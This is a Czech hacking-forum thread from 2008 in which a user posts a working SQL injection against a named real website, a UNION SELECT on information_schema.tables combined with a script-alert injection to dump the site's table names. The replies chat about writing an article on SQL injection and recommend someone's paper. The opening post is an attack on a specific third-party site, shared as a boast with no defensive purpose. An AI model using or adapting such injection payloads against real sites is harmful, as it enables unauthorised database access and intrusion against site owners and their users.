owebu.cz SIXSS

BugTrack

owebu.cz SIXSS#
hh, listujeme tabulky z db alertem :D [link]

owebu.cz/serialy.php?serial=65 UNION ALL SELECT
0,'h','hovno2','hovno3',
concat("<script>alert('SIXSS by Pr00y4m - tabulky:
",table_name,"');</script>"),table_na
me FROM
information_schema.tables WHERE table_schema=database() /*

----------
Pravá láska je, když si zapamatuješ její IP, abys obešel zpoždění DNS :)
(odpovědět)
Pr00y4m | E-mail | Website1.3.2008 23:57
re: owebu.cz SIXSS#
Zajimavej postup, nechtel by jsi tuhle moznost trochu vic popsat?
(odpovědět)
infinity | 213.19.59.*2.3.2008 11:30
re: owebu.cz SIXSS#
pise o ni RubberDuck ve svem paperu :)

----------
..:@]> [link] <[@:..
(odpovědět)
DjH | E-mail | Website | ICQ 319-960-8952.3.2008 13:03
re: owebu.cz SIXSS#
DjH: No to mi je jasny, ja myslel nejak rozepsat to alertovani dat z db :P
(odpovědět)
infinity | 213.19.59.*2.3.2008 13:27
re: owebu.cz SIXSS#
to je jasne myslim z kodu ne? :)

----------
..:@]> [link] <[@:..
(odpovědět)
DjH | E-mail | Website | ICQ 319-960-8952.3.2008 13:40
re: owebu.cz SIXSS#
DjH: Ja myslel rozepsat jako clanek, ne nejakou napovedu pro me. Poradnej clanek o sql injekt tady jeste neni.
(odpovědět)
infinity | 213.19.59.*2.3.2008 14:16
re: owebu.cz SIXSS#
a ja zas rikam ze ten RubberDuckuv paper nema chybu, takze bud sem pastnout ten jeho paper o SQL injekci (samozrejme muze byt trochu upravenej ;)), nebo udelat jeste lepsi clanek :)

----------
..:@]> [link] <[@:..
(odpovědět)
DjH | E-mail | Website | ICQ 319-960-8952.3.2008 14:24
re: owebu.cz SIXSS#
DjH: Souhlas :) Vyborne napsany paper, melo by to vyjit v papirove verzi... :)

Jinak, je to tu: [link]

----------
Pravá láska je, když si zapamatuješ její IP, abys obešel zpoždění DNS :)
(odpovědět)
Pr00y4m | E-mail | Website2.3.2008 14:33

Zpět
 
 
 

 
BBCode